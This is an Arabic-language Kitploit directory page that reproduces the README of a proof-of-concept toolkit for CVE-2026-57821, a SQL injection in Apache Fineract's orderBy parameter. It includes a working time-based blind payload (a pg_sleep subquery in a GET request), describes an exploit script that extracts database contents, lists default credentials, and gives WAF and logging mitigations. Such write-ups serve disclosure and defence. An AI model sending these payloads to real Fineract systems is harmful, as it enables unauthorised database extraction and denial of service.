Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-57821-PoC-Exploit — 🔐 CVE-2026-57821 - Apache Fineract SQL Injection Toolkit 📚 نصّان بلغة بايثون للاختبار الأمني المصرح به: verifier.py (كشف آمن دون استخراج) وexploit.py (تحليل عميق). يدعم 11 نوعًا من قواعد البيانات. مثالي لفهم ثغرات حقن SQL. اختبارات قانونية فقط ⚠️ لأغراض تعليمية وبحثية فقط. | Kitploit
أدوات/GitHubGitHub/tc4dy/cve-2026-57821-poc-exploit
التحليل الثابتتحليل الثغرات الأمنيةتحليل الكودالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمأمن قواعد البيانات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
tc4dy/cve-2026-57821-poc-exploit

CVE-2026-57821-PoC-Exploit

🔐 CVE-2026-57821 - Apache Fineract SQL Injection Toolkit 📚 نصّان بلغة بايثون للاختبار الأمني المصرح به: verifier.py (كشف آمن دون استخراج) وexploit.py (تحليل عميق). يدعم 11 نوعًا من قواعد البيانات. مثالي لفهم ثغرات حقن SQL. اختبارات قانونية فقط ⚠️ لأغراض تعليمية وبحثية فقط.

عرض المستودع
3منذ شهر واحدلم تتم المراجعة بعد

CVE-Picture

🛡️ CVE-2026-57821 – ثغرة حقن SQL في Apache Fineract

⚠️ إشعار قانوني وأخلاقي
تم توفير هذه الأداة لأغراض التعليم والتدريب واختبار الأمان المصرح به فقط.
الاستخدام غير المصرح به ضد أي نظام دون إذن كتابي صريح غير قانوني وينتهك قوانين جرائم الحاسوب.
لا يتحمل المؤلف أي مسؤولية عن إساءة الاستخدام أو الضرر.
أنت وحدك المسؤول عن أفعالك.


📋 نظرة عامة على الثغرة

CVE-2026-57821 هي ثغرة حقن SQL تم اكتشافها في نقطة نهاية واجهة برمجة التطبيقات الخاصة بقائمة المكاتب في Apache Fineract.

🎯 المكوّن المتأثر

السمةالتفاصيل
نقطة النهاية/api/v1/offices
المعاملorderBy
الطريقةGET
المصادقة المطلوبةنعم (للمستخدمين المصادق عليهم فقط)
الإصدارات المتأثرةApache Fineract ≤ 1.14.0
الإصدار المُصحَّحApache Fineract 1.15.0

🧠 كيف تعمل الثغرة

توجد الثغرة لأن المعامل orderBy يُدمج مباشرة في استعلامات SQL دون تطهير مناسب. يمكن للمهاجم الذي يمتلك بيانات اعتماد صالحة حقن استعلامات فرعية بين قوسين () في المعامل orderBy.

لماذا يتجاوز هذا الإصلاحات السابقة:

  • قدم CVE-2024-32838 أداة ColumnValidator لتنظيف جمل ORDER BY
  • يفشل المدقق في اكتشاف الاستعلامات الفرعية المجردة داخل الأقواس
  • يسمح ذلك بتنفيذ SQL عشوائي داخل سياق ORDER BY

مثال على متجه الهجوم:

GET /api/v1/offices?orderBy=(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)&limit=1

⚡ التأثير المحتمل

التأثيرالوصف
سرقة البياناتيمكن لحقن SQL الأعمى القائم على الوقت استخراج محتوى حساس من قاعدة البيانات
رفض الخدمةيمكن للاستعلامات الثقيلة استنزاف موارد مجموعة الاتصالات
كشف المعلوماتيمكن للتقنيات القائمة على الأخطاء كشف بنية قاعدة البيانات وبياناتها

👤 الاكتشاف والإفصاح


🗄️ أنظمة قواعد البيانات المدعومة

تقوم هذه الأداة تلقائيًا باكتشاف وتكييف تقنيات الاستغلال لما يصل إلى 11 خلفية قاعدة بيانات مختلفة:


🛠️ مكونات الأداة

يوفر هذا المشروع سكربتين بلغة Python لسيناريوهات تقييم أمان مختلفة:

📊 verifier.py – أداة تحقق آمنة وحد أدنى

الغرض: إثبات وجود الثغرة بسرعة دون استخراج أي بيانات.

ما تقوم به:

  • إرسال حمولات اختبار خاصة بكل قاعدة بيانات
  • كشف التأخير الزمني أو رسائل الأخطاء
  • الإبلاغ عن VULNERABLE أو NOT VULNERABLE لكل نوع قاعدة بيانات
  • لا تقوم بتسريب أي بيانات

✅ المزايا:

  • سريعة للغاية (تكتمل في ثوانٍ)
  • خطر قانوني منخفض (تتحقق فقط من وجود الثغرة)
  • مثالية لفحص الأمان الأولي
  • مخرجات صديقة للتقارير والامتثال

📋 حالة الاستخدام: تقييم أولي لتحديد ما إذا كان الهدف معرضًا للثغرة.

🔬 exploit.py – محلل أمان شامل

الغرض: استغلال الثغرة بالكامل لاستخراج معلومات قاعدة البيانات.

ما يقوم به:

  • يكشف نوع قاعدة البيانات تلقائيًا
  • يستخدم البحث الثنائي لاستخراج البيانات حرفًا بحرف
  • يستخرج: الإصدار، المستخدم الحالي، اسم قاعدة البيانات، قائمة الجداول (قابلة للتكوين)
  • MSSQL: استخراج قائم على الأخطاء
  • البقية: استخراج قائم على الوقت مع معايرة خط الأساس

✅ المزايا:

  • يوفر دليلًا ملموسًا على الأثر
  • يُظهر المدى الكامل للثغرة
  • تسجيل مفصّل بمخرجات ملونة

📋 حالة الاستخدام: تحليل أمان متعمق بعد تأكيد الثغرة.

🔍 الفرق الرئيسي: يخبرك verifierPoC.py ما إذا كانت الثغرة موجودة؛ بينما يُظهر لك exploit.py ما الذي يمكن استخراجه. كلاهما يؤدي أدوارًا متميزة ومتكاملة في سير عمل تقييم الأمان.


⚙️ التثبيت والإعداد

المتطلبات الأساسية

  • Python 3.6+
  • مكتبة requests
root@kitploit:~
pip install requests

⚙️ متغيرات الإعداد

قم بتحرير المتغيرات التالية في أعلى كلا السكربتين:

🚀 دليل الاستخدام

1️⃣ exploit.py - الفحص العميق

root@kitploit:~
python3 exploit.py

المخرجات المتوقعة:

root@kitploit:~
CVE-2026-57821 - Apache Fineract Vulnerability Verifier
══════════════════════════════════════════════════════════════════════════════════════
@tc4dy is here :) Good Luck!

CONNECTION SUCCESS
BASELINE: 0.234s
STARTING VULNERABILITY VERIFICATION
VERIFICATION RESULTS
PostgreSQL: VULNERABLE
MySQL: NOT VULNERABLE
MariaDB: NOT VULNERABLE
Oracle: NOT VULNERABLE
MSSQL: NOT VULNERABLE
CONCLUSION: TARGET IS VULNERABLE (CVE-2026-57821 CONFIRMED)

التفسير: إذا ظهرت VULNERABLE لأي نوع قاعدة بيانات، فإن الهدف متأثر.

🎯 المواصفات الفنية

درجة CVSS المقياس القيمة درجة أساسية CVSS v3.1 8.1 (عالية) المتجه CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H متجه الهجوم شبكة الامتيازات المطلوبة منخفضة تفاعل المستخدم لا شيء درجة EPSS

root@kitploit:~
0.29% (احتمالية الاستغلال خلال 30 يومًا)

تخطيط CWE

root@kitploit:~
CWE‑89: تحييد غير صحيح للعناصر الخاصة المستخدمة في أمر SQL ('حقن SQL')

🧪 الغوص الفني العميق

لماذا تعمل الحمولة

الكود المعرض للثغرة في Apache Fineract 1.14.0:

root@kitploit:~
// Simplified vulnerable logic
String orderBy = request.getParameter("orderBy");
if (ColumnValidator.isValid(orderBy)) {
    // VALIDATOR FAILS FOR: "(SELECT ...)"
    // Only checks against simple column names
    String sql = "SELECT * FROM offices ORDER BY " + orderBy;
    // Executes query with user input directly
}

مثال على حمولة المهاجم:

root@kitploit:~
GET /api/v1/offices?orderBy=(SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)&limit=1

استعلام SQL الناتج:

root@kitploit:~
SELECT * FROM offices ORDER BY (SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END)

يتحقق ColumnValidator من أسماء الأعمدة لكنه يفوّت الاستعلام الفرعي المتداخل، مما يسمح بتنفيذ SQL عشوائي.

🛡️ التخفيف

تنزيل الأداة
السمةالتفاصيل
المكتشف / المُبلِّغTerence Monteiro (فريق Apache Fineract)
تاريخ الإفصاح العام14 يوليو 2026
الإصدار المُصحَّحApache Fineract 1.15.0
الإعلان الرسميApache Mailing List
الإصلاح على GitHubPR #6048
قاعدة البياناتطريقة الاكتشافتقنية الاستغلال
PostgreSQLقائم على الوقت (pg_sleep)أعمى زمني
MySQLقائم على الوقت (SLEEP)أعمى زمني
MariaDBقائم على الوقت + @@version_commentأعمى زمني
MSSQLقائم على الأخطاء (فشل CONVERT)قائم على الأخطاء
Oracleقائم على الوقت (DBMS_LOCK.SLEEP)أعمى زمني
SQLiteاستعلام ثقيل (انضمام ديكارتي)أعمى زمني (ثقيل)
Firebirdاستعلام ثقيل (انضمام ديكارتي)أعمى زمني (ثقيل)
DB2استعلام ثقيل (انضمام ديكارتي)أعمى زمني (ثقيل)
Informixاستعلام ثقيل (انضمام ديكارتي)أعمى زمني (ثقيل)
H2استعلام ثقيل (انضمام ديكارتي)أعمى زمني (ثقيل)
غير معروف (عام)الرجوع إلى PostgreSQLأعمى زمني
المتغيرالوصفالافتراضي
TARGETعنوان URL لواجهة Fineract APIhttp://localhost:8080/fineract-provider/api/v1/offices
USERNAMEاسم مستخدم مصادقة APImifos
PASSWORDكلمة مرور مصادقة APIpassword
TENANT_IDمعرّف المستأجرdefault
BASE_SLEEPمدة النوم لاختبارات الوقت (exploit.py)6
SLEEP_SECONDSمدة النوم لاختبارات الوقت (verifier.py)5
TIMEOUTمهلة طلب HTTP25 (exploit) / 15 (verifier)
MAX_RETRIESعدد مرات إعادة المحاولة للطلبات الفاشلة2
الإجراءالأولوية
الترقية إلى Apache Fineract 1.15.0+🔴 حرجة
تطبيق تصحيح PR #6048🔴 حرجة
قاعدة WAF: حظر orderBy الذي يحتوي على (SELECT أو SLEEP( أو pg_sleep( أو WAITFOR🟠 عالية
مراقبة السجلات بحثًا عن orderBy مع أقواس أو كلمات استعلام فرعي🟠 عالية
مراقبة مجموعة اتصالات قاعدة البيانات لاكتشاف استنزاف الموارد🟡 متوسطة